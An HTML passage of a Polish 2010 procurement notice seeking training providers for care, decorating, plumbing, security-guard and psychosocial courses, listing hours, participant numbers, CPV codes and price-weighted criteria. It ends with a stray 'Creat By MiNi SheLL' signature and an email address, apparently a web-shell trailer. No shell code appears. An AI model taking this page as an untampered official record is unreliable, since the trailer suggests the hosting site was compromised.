<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs opieki nad dziećmi, chorymi i osobami starszymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia
Nazwa kursu: 
Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 6 osób i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs malarz-tapeciarz- regipsiarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego. 
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób:  3 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 150 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs monter instalacji wod-kan-gaz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 2 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 200 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs ochrony osób i mienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi szkolenia zawodowego. 
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 4 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie A
Trening umiejętności społecznych + indywidualne i grupowe doradztwozawodowe + poradnictwo prawne
Zadanie B
Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe-.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie A
Usługi szkolenia psychospołecznego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób: 10 osób oraz 5 dzieci objętych opieką  
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2010r
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 70 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia  winny odbywać się od poniedziałku do piątku po max 7 godz. Lekcyjnych.
Zadanie B
Usługi szkolenia psychospołecznego. 
Liczba osób:  30 osób.
Czas trwania szkolenia:  od dnia podpisania umowy do 31.12.2010r
W szkoleniu powyższym będzie uczestniczyć grupa 30 osób. Realizacja szkolenia musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych godzina szkolenia = godzina lekcyjna =  45 min.
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 79.14.00.00-7, 85.31.23.20-8, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com